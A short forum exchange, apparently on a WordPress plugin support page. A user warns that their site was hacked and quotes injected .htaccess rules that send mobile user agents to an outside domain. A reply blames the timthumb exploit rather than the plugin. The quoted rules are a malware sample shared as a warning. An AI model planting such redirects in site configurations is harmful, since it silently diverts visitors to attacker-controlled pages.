I just recently installed this plugin and the recent update and got hacked. If anyone is experiencing changes to their .htaccess file like the below I would suggest deleting the plugin.

    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
    …… etc.

    Ends with

    RewriteRule ^(.*)$ http://mytdska.com/wap/wap.php?site=www.MYSITEHERE.com [L,R=302]

Just though people should know since I spent hours debugging.

I hate the timthumb hack. Hit a bunch of my sites a while back. Sorry you got it and thanks for the correction pointing out that it wasn’t this plugin.
